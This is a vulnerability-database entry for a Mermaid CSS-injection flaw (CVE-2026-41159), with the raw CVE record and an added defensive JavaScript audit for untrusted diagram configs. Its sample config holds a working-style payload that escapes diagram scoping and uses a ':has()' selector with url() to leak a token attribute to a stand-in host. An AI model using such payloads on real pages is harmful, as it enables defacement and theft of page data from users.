CVE-2026-41159 (GCVE-0-2026-41159)
Vulnerability from cvelistv5 – Published: 2026-05-29 13:53 – Updated: 2026-05-29 15:02
Title
Mermaid: Improper sanitization of configuration leads to CSS injection
Summary
Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. Prior to 10.9.6 and 11.15.0, Mermaid's default configuration allows injecting CSS that applies outside of the Mermaid diagram via the fontFamily, themeCSS, and altFontFamily configuration options. The injected CSS exploits stylis's & (scope reference) handling. :not(&) escapes the #mermaid-xxx automatic scoping, applying styles to all page elements. Global at-rules (@font-face, @keyframes, @counter-style) are also injectable as stylis hoists them to top level. This allows page defacement and DOM attribute exfiltration via CSS :has() selectors. This vulnerability is fixed in 10.9.6 and 11.15.0.
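The escape works because stylis treats `&` as a reference to the enclosing selector: Mermaid wraps its generated stylesheet in `#mermaid-<id> { ... }`, so a nested `:not(&)` becomes `:not(#mermaid-<id>)`, which matches every element outside the diagram, while at-rules such as `@font-face` are emitted at the top level where no scope applies. The JavaScript below is an added example, not code from Mermaid, stylis or the advisory: `expandScope` models only the `&` substitution so the escape is visible, and `auditMermaidConfig` checks `fontFamily`, `altFontFamily` and `themeCSS` for the patterns the advisory describes before a renderer hands untrusted config (for instance config set from diagram text) to an unpatched Mermaid. The function names, finding strings and sample payload are this example's own constructions; the audit is defence in depth and does not replace upgrading to 10.9.6 / 11.15.0.

```javascript
// Added example, not code from Mermaid, stylis or the advisory.
// Assumed from the advisory: the option names fontFamily, altFontFamily, themeCSS,
// the #mermaid-<id> scoping, and the three hoisted at-rules it names.

// stylis rewrites `&` inside a nested rule to the enclosing selector. Mermaid wraps its
// stylesheet in `#mermaid-<id> { ... }`, so `&` becomes that id. This helper models
// only that substitution (it is not stylis): `:not(&)` -> `:not(#mermaid-1)`.
function expandScope(scopeSelector, nestedSelector) {
  return nestedSelector.includes('&')
    ? nestedSelector.replace(/&/g, scopeSelector)
    : `${scopeSelector} ${nestedSelector}`;
}

// A font-family value is a comma-separated list of quoted strings or bare identifiers.
// `;`, `}`, `&` or `:` cannot occur in one, so a value containing them is rejected
// outright instead of being "sanitised".
const FONT_TOKEN = String.raw`(?:"[^"\\]*"|'[^'\\]*'|[A-Za-z_][\w-]*(?:\s+[A-Za-z_][\w-]*)*)`;
const FONT_FAMILY_RE = new RegExp(`^\\s*${FONT_TOKEN}(?:\\s*,\\s*${FONT_TOKEN})*\\s*$`);

// At-rules the advisory names as hoisted to top level by stylis.
const HOISTED_AT_RULES = ['@font-face', '@keyframes', '@counter-style'];

function auditThemeCSS(css) {
  const findings = [];
  // `&` inside :not() is the advisory's escape; :is()/:where() with a selector list
  // are flagged on the same principle (this example's assumption).
  if (/:(?:not|is|where)\([^)]*&/i.test(css)) {
    findings.push('scope-escape: & inside :not()/:is()/:where()');
  }
  for (const rule of HOISTED_AT_RULES) {
    if (css.toLowerCase().includes(rule)) findings.push(`hoisted-at-rule: ${rule}`);
  }
  // Any other at-rule in a theme override is unusual enough to review by hand.
  for (const m of css.matchAll(/@[a-z-]+/gi)) {
    if (!HOISTED_AT_RULES.includes(m[0].toLowerCase())) findings.push(`at-rule: ${m[0]} (review)`);
  }
  // :has() plus url() is the attribute-exfiltration primitive the advisory describes.
  if (/:has\(/i.test(css)) findings.push('selector: :has()');
  if (/url\s*\(/i.test(css)) findings.push('external-fetch: url()');
  const open = (css.match(/\{/g) || []).length;
  const close = (css.match(/\}/g) || []).length;
  if (open !== close) findings.push(`unbalanced-braces: ${open} open, ${close} close`);
  return findings;
}

// Audit a Mermaid config object before it reaches initialize()/render().
// Returns an array of human-readable findings; empty means nothing suspicious.
function auditMermaidConfig(config) {
  const findings = [];
  for (const key of ['fontFamily', 'altFontFamily']) {
    const v = config[key];
    if (typeof v === 'string' && !FONT_FAMILY_RE.test(v)) {
      findings.push(`${key}: not a font-family list`);
    }
  }
  if (typeof config.themeCSS === 'string') {
    findings.push(...auditThemeCSS(config.themeCSS).map((f) => `themeCSS: ${f}`));
  }
  return findings;
}

// Constructed sample (not from the advisory): the shape of an attacker-controlled config.
const SAMPLE_CONFIG = {
  fontFamily: 'arial; } :not(&) { display: none; } .x { font-family: a',
  themeCSS: ':not(&):has(input[name=token][value^="a"]) { background: url(//example.test/a) }'
    + ' @font-face { font-family: x; src: url(//example.test/f) }',
};

console.log(expandScope('#mermaid-1', ':not(&)')); // :not(#mermaid-1)
console.log(auditMermaidConfig(SAMPLE_CONFIG));
```

A legitimate stack such as `"trebuchet ms", verdana, arial, sans-serif` passes unchanged. The font-family check is deliberately an allow-list rather than a blocklist: anything that survives into `font-family: ...;` inside the scoped stylesheet is CSS the attacker wrote, so the only safe outcome for a malformed value is to drop the diagram's config, not to strip characters from it.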
Severity
CVSS 4.0 base score 5.3 (MEDIUM), vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L, scored by the CNA (GitHub_M). The impact on the vulnerable component itself is integrity only (VI:L); the confidentiality, integrity and availability impacts fall on the subsequent system, i.e. the page that embeds the diagram (SC:L/SI:L/SA:L). CISA ADP SSVC: Exploitation none, Automatable no, Technical Impact partial.
CWE
- CWE-94 - Improper Control of Generation of Code ('Code Injection')
Assigner
GitHub_M (CNA); source advisory GHSA-87f9-hvmw-gh4p
References
4 references
| URL | Tags |
|---|---|
| https://github.com/mermaid-js/mermaid/security/ad… | x_refsource_CONFIRM |
| https://github.com/mermaid-js/mermaid/commit/6476… | x_refsource_MISC |
| https://github.com/mermaid-js/mermaid/releases/ta… | x_refsource_MISC |
| https://github.com/mermaid-js/mermaid/releases/ta… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Affected versions | Fixed in |
|---|---|---|---|
| mermaid-js | mermaid | >= 11.0.0-alpha.1, < 11.15.0 | 11.15.0 |
| mermaid-js | mermaid | < 10.9.6 | 10.9.6 |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-41159",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-29T15:02:42.708368Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-29T15:02:56.459Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "mermaid",
"vendor": "mermaid-js",
"versions": [
{
"status": "affected",
"version": "\u003e= 11.0.0-alpha.1, \u003c 11.15.0"
},
{
"status": "affected",
"version": "\u003c 10.9.6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. Prior to 10.9.6 and 11.15.0, Mermaid\u0027s default configuration allows injecting CSS that applies outside of the Mermaid diagram via the fontFamily, themeCSS, and altFontFamily configuration options. The injected CSS exploits stylis\u0027s \u0026 (scope reference) handling. :not(\u0026) escapes the #mermaid-xxx automatic scoping, applying styles to all page elements. Global at-rules (@font-face, @keyframes, @counter-style) are also injectable as stylis hoists them to top level. This allows page defacement and DOM attribute exfiltration via CSS :has() selectors. This vulnerability is fixed in 10.9.6 and 11.15.0."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "LOW",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "LOW",
"userInteraction": "PASSIVE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "LOW"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-94",
"description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-29T13:53:10.148Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/mermaid-js/mermaid/security/advisories/GHSA-87f9-hvmw-gh4p",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/mermaid-js/mermaid/security/advisories/GHSA-87f9-hvmw-gh4p"
},
{
"name": "https://github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aahttps://github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aahttps://github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76"
},
{
"name": "https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.15.0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.15.0"
},
{
"name": "https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6"
}
],
"source": {
"advisory": "GHSA-87f9-hvmw-gh4p",
"discovery": "UNKNOWN"
},
"title": "Mermaid: Improper sanitization of configuration leads to CSS injection"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-41159",
"datePublished": "2026-05-29T13:53:10.148Z",
"dateReserved": "2026-04-17T16:34:45.524Z",
"dateUpdated": "2026-05-29T15:02:56.459Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2026-41159\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-29T15:16:22.813\",\"lastModified\":\"2026-05-29T16:25:57.843\",\"vulnStatus\":\"Undergoing Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. Prior to 10.9.6 and 11.15.0, Mermaid\u0027s default configuration allows injecting CSS that applies outside of the Mermaid diagram via the fontFamily, themeCSS, and altFontFamily configuration options. The injected CSS exploits stylis\u0027s \u0026 (scope reference) handling. :not(\u0026) escapes the #mermaid-xxx automatic scoping, applying styles to all page elements. Global at-rules (@font-face, @keyframes, @counter-style) are also injectable as stylis hoists them to top level. This allows page defacement and DOM attribute exfiltration via CSS :has() selectors. This vulnerability is fixed in 10.9.6 and 
11.15.0.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":5.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"PASSIVE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"LOW\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"LOW\",\"subIntegrityImpact\":\"LOW\",\"subAvailabilityImpact\":\"LOW\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-94\"}]}],\"references\":[{\"url\":\"https://github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aahttps://github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76\"
,\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.15.0\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/mermaid-js/mermaid/security/advisories/GHSA-87f9-hvmw-gh4p\",\"source\":\"security-advisories@github.com\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-41159\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-29T15:02:42.708368Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-29T15:02:48.026Z\"}}], \"cna\": {\"title\": \"Mermaid: Improper sanitization of configuration leads to CSS injection\", \"source\": {\"advisory\": \"GHSA-87f9-hvmw-gh4p\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 5.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L\", \"userInteraction\": \"PASSIVE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"LOW\", \"vulnIntegrityImpact\": \"LOW\", \"subAvailabilityImpact\": \"LOW\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"LOW\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"mermaid-js\", \"product\": \"mermaid\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 11.0.0-alpha.1, \u003c 11.15.0\"}, {\"status\": \"affected\", \"version\": \"\u003c 10.9.6\"}]}], \"references\": [{\"url\": \"https://github.com/mermaid-js/mermaid/security/advisories/GHSA-87f9-hvmw-gh4p\", \"name\": \"https://github.com/mermaid-js/mermaid/security/advisories/GHSA-87f9-hvmw-gh4p\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aahttps://github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76\", \"name\": 
\"https://github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aahttps://github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.15.0\", \"name\": \"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.15.0\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6\", \"name\": \"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. Prior to 10.9.6 and 11.15.0, Mermaid\u0027s default configuration allows injecting CSS that applies outside of the Mermaid diagram via the fontFamily, themeCSS, and altFontFamily configuration options. The injected CSS exploits stylis\u0027s \u0026 (scope reference) handling. :not(\u0026) escapes the #mermaid-xxx automatic scoping, applying styles to all page elements. Global at-rules (@font-face, @keyframes, @counter-style) are also injectable as stylis hoists them to top level. This allows page defacement and DOM attribute exfiltration via CSS :has() selectors. This vulnerability is fixed in 10.9.6 and 11.15.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-94\", \"description\": \"CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-29T13:53:10.148Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-41159\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-29T15:02:56.459Z\", \"dateReserved\": \"2026-04-17T16:34:45.524Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-29T13:53:10.148Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}